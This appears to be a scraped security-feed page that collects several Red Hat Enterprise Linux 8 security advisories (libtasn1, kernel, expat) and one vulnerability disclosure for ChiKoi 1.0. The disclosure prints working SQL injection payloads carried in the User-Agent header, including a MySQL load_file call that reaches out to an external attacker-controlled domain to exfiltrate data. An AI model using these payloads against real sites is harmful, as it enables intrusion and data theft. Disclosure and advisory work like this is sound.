Red Hat Security Advisory 2023-0116-01 - A library that provides Abstract Syntax Notation One parsing and structures management, and Distinguished Encoding Rules encoding and decoding functions.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: libtasn1 security update  
Advisory ID:       RHSA-2023:0116-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0116  
Issue date:        2023-01-12  
CVE Names:         CVE-2021-46848   
=====================================================================

1. Summary:

An update for libtasn1 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

A library that provides Abstract Syntax Notation One (ASN.1, as specified  
by the X.680 ITU-T recommendation) parsing and structures management, and  
Distinguished Encoding Rules (DER, as per X.690) encoding and decoding  
functions.

Security Fix(es):

* libtasn1: Out-of-bound access in ETYPE_OK (CVE-2021-46848)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2140058 - CVE-2021-46848 libtasn1: Out-of-bound access in ETYPE_OK

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
libtasn1-debuginfo-4.13-4.el8_7.aarch64.rpm  
libtasn1-debugsource-4.13-4.el8_7.aarch64.rpm  
libtasn1-devel-4.13-4.el8_7.aarch64.rpm  
libtasn1-tools-4.13-4.el8_7.aarch64.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.aarch64.rpm

ppc64le:  
libtasn1-debuginfo-4.13-4.el8_7.ppc64le.rpm  
libtasn1-debugsource-4.13-4.el8_7.ppc64le.rpm  
libtasn1-devel-4.13-4.el8_7.ppc64le.rpm  
libtasn1-tools-4.13-4.el8_7.ppc64le.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.ppc64le.rpm

s390x:  
libtasn1-debuginfo-4.13-4.el8_7.s390x.rpm  
libtasn1-debugsource-4.13-4.el8_7.s390x.rpm  
libtasn1-devel-4.13-4.el8_7.s390x.rpm  
libtasn1-tools-4.13-4.el8_7.s390x.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.s390x.rpm

x86_64:  
libtasn1-debuginfo-4.13-4.el8_7.i686.rpm  
libtasn1-debuginfo-4.13-4.el8_7.x86_64.rpm  
libtasn1-debugsource-4.13-4.el8_7.i686.rpm  
libtasn1-debugsource-4.13-4.el8_7.x86_64.rpm  
libtasn1-devel-4.13-4.el8_7.i686.rpm  
libtasn1-devel-4.13-4.el8_7.x86_64.rpm  
libtasn1-tools-4.13-4.el8_7.x86_64.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.i686.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
libtasn1-4.13-4.el8_7.src.rpm

aarch64:  
libtasn1-4.13-4.el8_7.aarch64.rpm  
libtasn1-debuginfo-4.13-4.el8_7.aarch64.rpm  
libtasn1-debugsource-4.13-4.el8_7.aarch64.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.aarch64.rpm

ppc64le:  
libtasn1-4.13-4.el8_7.ppc64le.rpm  
libtasn1-debuginfo-4.13-4.el8_7.ppc64le.rpm  
libtasn1-debugsource-4.13-4.el8_7.ppc64le.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.ppc64le.rpm

s390x:  
libtasn1-4.13-4.el8_7.s390x.rpm  
libtasn1-debuginfo-4.13-4.el8_7.s390x.rpm  
libtasn1-debugsource-4.13-4.el8_7.s390x.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.s390x.rpm

x86_64:  
libtasn1-4.13-4.el8_7.i686.rpm  
libtasn1-4.13-4.el8_7.x86_64.rpm  
libtasn1-debuginfo-4.13-4.el8_7.i686.rpm  
libtasn1-debuginfo-4.13-4.el8_7.x86_64.rpm  
libtasn1-debugsource-4.13-4.el8_7.i686.rpm  
libtasn1-debugsource-4.13-4.el8_7.x86_64.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.i686.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-46848  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i8dzjgjWX9erEAQiZmhAAmQwNAKws70pWIocKzUsb/fYYYMcchqrn  
43gAEVYZ+USKwd0/le9Xbhx7Z22mrabueClq9A74J4B2YXmzFqOJLOz+7LCQAx8+  
B86MlnkcRHNTT5tyi6qmWTm99GqOpyuKf30N5AYceAfBbCO6D9B2bBEyaIb+uSwB  
Sw5EJJFblXhZlHF67K6Lp7I6NSj5aSK+KT6Jru5qJQ/v6K5TznOIyvUJriW4GyQK  
n+xhXLizOV14Rkh6TaWarz7fIKWsAffLUU+n2ZJ3bPbRrL7PqNrTm46AJoZgNK51  
0IbA5xORFGgJaUk+3dTiwvqr6yBSWGWyztqOi7ywoGdeGZf768YHzcMNbTqAGmrd  
wETBwvg/QMSZHeJ62ALGOnkGgzFZqr8/Yu4hJ2Tb8D6oww6MWO4E2Z/BB8madOA+  
q05+JfrIDe3WU+GMYjlmzjezWbKmAQdUnbPkX0fCYtT+0D7R8HN8MLCOR8Bi/Vlo  
06gjDT0rKElpETR81LF70shM6vXRQ4UjmwmPXcHbNTCiNSgE8NNy7woEZT1rsYog  
dY2Y9Ah2nodWTgObLn2X9XEsgjr/lc2Dc4l3DCl1l2sdI74UstqAiYiM6L6QTC/r  
E5wlx10mcbHPTXUOh+NbESzH5IWuqKXaxWjdp0R4vCLuN4+WUHAu9dN2YQTk1E89  
m3+mOt3oApY=  
=53fB  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0116-01

Red Hat Security Advisory 2023-0099-01 - Kernel-based Virtual Machine offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems. Issues addressed include an out of bounds read vulnerability.

Red Hat Security Advisory 2023-0099-01

ChiKoi version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: ChiKoi-1.0 SQLi## Author: nu11secur1ty## Date: 01.12.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'was submitted in the User-Agent HTTP header.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The attacker can steal all information from this system and canseriously harm the users of this system,such as extracting bank accounts through which they pay each other, etc.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQL---Parameter: User-Agent (User-Agent)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNIONSELECT 6994) END))-- -    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR---```[+] Online:```MySQL---Parameter: User-Agent (User-Agent)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNIONSELECT 6426) END))-- ----```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)## Proof and Exploit:[href](https://streamable.com/7x69yz)## Time spent`01:30:00`## Writing an exploit`00:05:00`

ChiKoi 1.0 SQL Injection

Red Hat Security Advisory 2023-0101-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:0101-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0101  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-2964 CVE-2022-4139   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: memory corruption in AX88179_178A based USB ethernet device.  
(CVE-2022-2964)

* kernel: i915: Incorrect GPU TLB flush can lead to random memory access  
(CVE-2022-4139)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* RHEL8.4 - zfcp: fix missing auto port scan and thus missing target ports  
(BZ#2127849)

* vfio zero page mappings fail after 2M instances (BZ#2128515)

* ice: Driver Update up to 5.19 (BZ#2130992)

* atlantic: missing hybernate/resume fixes (BZ#2131935)

* Bluefield 2 DPU would crash and reboot due to a kernel panic (BZ#2134084)

* Fix issue that enables STABLE_WRITES by default and causes performance  
regressions (BZ#2135813)

* ice: Intel E810 PTP clock glitching (BZ#2136036)

* ice: configure link-down-on-close on and change interface mtu to 9000,the  
interface can't up (BZ#2136216)

* ice: dump additional CSRs for Tx hang debugging (BZ#2136513)

* ice,iavf: system panic during sriov sriov_test_cntvf_reboot testing  
(BZ#2137270)

* After upgrading to ocp4.11.1, our dpdk application using vlan strip  
offload is not working (BZ#2138157)

* i40e: orphaned-leaky memory when interacting with driver memory  
parameters (BZ#2138205)

* WARNING: CPU: 0 PID: 9637 at kernel/time/hrtimer.c:1309  
hrtimer_start_range_ns+0x35d/0x400 (BZ#2138953)

* DELL EMC 8.6-RT: System is not booting into RT Kernel with perc12.  
(BZ#2139216)

* Lenovo 8.7: The VGA display shows no signal when install RHEL8.7  
(BZ#2140152)

* Host Pod -> NodePort Service traffic (Host Backend - Same Node) Flow  
Iperf Cannot Pass Traffic (BZ#2141878)

* mlx5_core: mlx5_cmd_check messages scrolling with hardware offload  
enabled (BZ#2141957)

* net/ice: VIRTCHNL_OP_CONFIG_VSI_QUEUES command handling failure with  
in-tree driver (BZ#2142017)

* RHEL:8.6+ IBM Partner issue - Loopback driver with ABORT_TASKS causing  
hangs in scsi eh, this bug was cloned for RHEL8.6 and need this patch in  
8.6+ (BZ#2144583)

* AMdCLIENT 8.8: The kernel command line parameter "nomodeset" not working  
properly (BZ#2145218)

* Path loss during Volume Ownership Change on RHEL 8.7 SAS (BZ#2147374)

* net/ice: OP_SET_RSS_HENA command not supported with in-tree driver  
(BZ#2148130)

* iavf panic: iavf 0000:ca:01.0: Failed to init adminq: -53 (BZ#2149081)

* Intel 8.8 iavf: Driver Update (bugfixes) (BZ#2149742)

* Azure RHEL-8 PCI: hv: Do not set PCI_COMMAND_MEMORY to reduce VM boot  
time (BZ#2150912)

* RHEL-8.7: System fails to boot with soft lockup while loading/unloading  
an unsigned (E) kernel module. (BZ#2152206)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2067482 - CVE-2022-2964 kernel: memory corruption in AX88179_178A based USB ethernet device.  
2147572 - CVE-2022-4139 kernel: i915: Incorrect GPU TLB flush can lead to random memory access

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kernel-4.18.0-425.10.1.el8_7.src.rpm

aarch64:  
bpftool-4.18.0-425.10.1.el8_7.aarch64.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-core-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-libs-4.18.0-425.10.1.el8_7.aarch64.rpm  
perf-4.18.0-425.10.1.el8_7.aarch64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
python3-perf-4.18.0-425.10.1.el8_7.aarch64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-425.10.1.el8_7.noarch.rpm  
kernel-doc-4.18.0-425.10.1.el8_7.noarch.rpm

ppc64le:  
bpftool-4.18.0-425.10.1.el8_7.ppc64le.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-core-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-libs-4.18.0-425.10.1.el8_7.ppc64le.rpm  
perf-4.18.0-425.10.1.el8_7.ppc64le.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
python3-perf-4.18.0-425.10.1.el8_7.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm

s390x:  
bpftool-4.18.0-425.10.1.el8_7.s390x.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-core-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-core-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-425.10.1.el8_7.s390x.rpm  
perf-4.18.0-425.10.1.el8_7.s390x.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
python3-perf-4.18.0-425.10.1.el8_7.s390x.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm

x86_64:  
bpftool-4.18.0-425.10.1.el8_7.x86_64.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-core-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-libs-4.18.0-425.10.1.el8_7.x86_64.rpm  
perf-4.18.0-425.10.1.el8_7.x86_64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
python3-perf-4.18.0-425.10.1.el8_7.x86_64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-425.10.1.el8_7.aarch64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-425.10.1.el8_7.x86_64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2964  
https://access.redhat.com/security/cve/CVE-2022-4139  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i69zjgjWX9erEAQi7og/+NmgRZHeaRAFdkzMYD9KOIoU1RNAlKAfu  
hJf63p0zW4JqRUcn7p+v3qFw84eBJR4Q+dWsx9I8IBKoZ+jZQQlvMOy17eXPnedD  
et7KieOv6+4YXYh9QDD6LzqXjrhdZCFVTbd2Yjhnsvll74o/r4T8at+MGZmAEbsc  
9vWDOyknBmusOnk1GcKKgvrOGfpw/WHKsn/O+iZAT3o1kEHxQoUF689rYGn/Nm56  
i+53s/QlbvXTAmiyMjMWTfM7fR899BRfYfEy0GCrFT7NOcXZ14DwZ4bgLXqeFaHv  
pIVDryqShKr6qUsp0Whb8y6RcqZebL57mCDmnGhrCn3O4n9RMtjn3ApDks9urp0t  
wmrO/TuejHqM9Agjyz2SZSJf23nJSoCxfssHkRPbd/NxPVv2a05iOe/GPrMdmA1D  
bLUKyIeAy8gxNzxIqrH/MmTlyddUVgy/3Oi15etSSRYxG3zPQYAIB3yxdVKxOS4K  
YJhZzL5OMQilO/dP3zYrGSjJkA5CTYU0laMs8QPDpBiKUJU8q/r7XRj6PS6THCOZ  
Xjpf66XYbT42v6Ly3lIvM+w6TZpy2NzxFBfq8Ab8J+ssUYzEpxlD7voZ0ca9rbzv  
V4SVdHzEpMITwqkW1OPjKMWYlFFkMn7RcgzU1jgxTTwN3y1IIJSVCU67NP4K+re7  
Vh1Z7+eM4CY=  
=B1Qw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0101-01

Red Hat Security Advisory 2023-0103-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: expat security update  
Advisory ID:       RHSA-2023:0103-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0103  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-43680   
=====================================================================

1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives  
a detailed severity rating, is available for each vulnerability from the  
CVE  
link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: use-after free caused by overeager destruction of a shared DTD in  
XML_ExternalEntityParserCreate (CVE-2022-43680)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2140059 - CVE-2022-43680 expat: use-after free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
expat-2.2.5-10.el8_7.1.src.rpm

aarch64:  
expat-2.2.5-10.el8_7.1.aarch64.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.aarch64.rpm  
expat-debugsource-2.2.5-10.el8_7.1.aarch64.rpm  
expat-devel-2.2.5-10.el8_7.1.aarch64.rpm

ppc64le:  
expat-2.2.5-10.el8_7.1.ppc64le.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.ppc64le.rpm  
expat-debugsource-2.2.5-10.el8_7.1.ppc64le.rpm  
expat-devel-2.2.5-10.el8_7.1.ppc64le.rpm

s390x:  
expat-2.2.5-10.el8_7.1.s390x.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.s390x.rpm  
expat-debugsource-2.2.5-10.el8_7.1.s390x.rpm  
expat-devel-2.2.5-10.el8_7.1.s390x.rpm

x86_64:  
expat-2.2.5-10.el8_7.1.i686.rpm  
expat-2.2.5-10.el8_7.1.x86_64.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.i686.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.x86_64.rpm  
expat-debugsource-2.2.5-10.el8_7.1.i686.rpm  
expat-debugsource-2.2.5-10.el8_7.1.x86_64.rpm  
expat-devel-2.2.5-10.el8_7.1.i686.rpm  
expat-devel-2.2.5-10.el8_7.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-43680  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i5tzjgjWX9erEAQgotw/7BCtmV6eYMcGDayo+BGOodho987OHD/Sq  
obdHtIuMbhVwA53WG78sijk86V4SMV7IJtOvBgP4HFB6syAyhy50yvLAiw+NYghb  
i0kZ1sokrJVfG9ztrp+ToL5HDkR/s7MDOrhRhP3AHqmiE26o1//W9SOa2XMyN0kU  
jhd949cSVPhS+ztVOU02Yf/gPWqg0lW9Cn1B2T/auXzYFMBeVh2JqmklssXRV6T0  
rPWxtjO4frmm2WDkBcSiwRRD8MH51xm9yxGkwJnvAVcZtpNBU9Hz51asJnGSU/Zn  
OUyIAY91b1JTT9C8omohqY3UVEEAZuq4gDwsQZbLl8nZzkyposKb7DAt1Z319kWa  
cBC6SrSKBW/kx5YIv/FTJoHQLfm5vZxxhVuIBZyB5g9dJr/F2kmuyp3URx1eo42q  
CbQl3LH9BX7IIBzFsCKmnwrcVdUyl61AHdcx2lL71fUSAnjd0FQ0yKN0qKAatQDx  
nuhnLqsAmcHa2yjRb1HXGB9ah5Wi2Wyk6cmpHqoHF/c4jGnCItyQ3STWnWwLrjlU  
eDdWmHEOK0qBjjguaLfc2c3qqUBHqc8hItD300DqizV6dX11hNSPexibwrusZXgk  
